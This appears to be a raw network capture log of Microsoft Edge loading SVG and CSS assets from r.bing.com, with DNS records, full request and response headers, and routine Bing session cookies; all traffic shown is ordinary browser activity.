e86303.dscx.akamaiedge.net

IN A

88.221.135.34

e86303.dscx.akamaiedge.net

IN A

88.221.135.41

e86303.dscx.akamaiedge.net

IN A

88.221.135.51

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

88.221.135.35
GET

https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:12 GMT
etag: 0x8DCDC608780CE8B
content-length: 512
content-type: image/svg+xml
content-md5: G0HPjgI1nZPfetni3YDkOw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f5f97b5b-c01e-002e-02f1-176a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=198020
expires: Fri, 06 Dec 2024 17:08:34 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306894.b0c9121
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:02:04 GMT
etag: 0x8DCDC5E6A2D8636
content-length: 349
content-type: image/svg+xml
content-md5: iRh5eBPrKqjGuvgWi/nStw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bf8d4ade-701e-0078-76e0-188227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=80963
expires: Thu, 05 Dec 2024 08:37:37 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306894.b0c912b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:41:12 GMT
etag: 0x8DCDC63E1AC19C2
content-length: 324
content-type: text/css
content-encoding: br
content-md5: zul1ioyI5qjKzvVMsqd8eQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c7c72aa6-101e-0041-7ad0-16c283000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=76978
expires: Thu, 05 Dec 2024 07:31:13 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c9559
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:40:29 GMT
etag: 0x8DCEC880F396E3D
content-length: 269
content-type: text/css
content-encoding: br
content-md5: Twb1SQrgn66TMkCHmLv8IQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f5fa2dc-801e-000b-4429-21f2e4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=254834
expires: Sat, 07 Dec 2024 08:55:29 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c955e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:29:57 GMT
etag: 0x8DCEC86967FA2A4
content-type: text/css; charset=utf-8
content-md5: yxQVEL8D2yYKzOkWuxDcBg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8c7a6c74-e01e-0054-6fe1-20001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 375
cache-control: public, no-transform, max-age=45067
expires: Wed, 04 Dec 2024 22:39:22 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c955f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:10:08 GMT
etag: 0x8DCDC67EC841DCF
content-length: 1343
content-type: text/css
content-encoding: br
content-md5: DnViWNsgH/Vlo3SrH5gEzg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b0d2f135-b01e-004c-1989-192d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=209260
expires: Fri, 06 Dec 2024 20:15:55 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c9567
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:46:34 GMT
etag: 0x8DCDC64A18F365B
content-length: 671
content-type: image/svg+xml
content-md5: 2e0aQjQvN2lVcUGQcPjoGA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 08fd2788-101e-0005-299e-161eef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=254789
expires: Sat, 07 Dec 2024 08:54:44 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c957c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
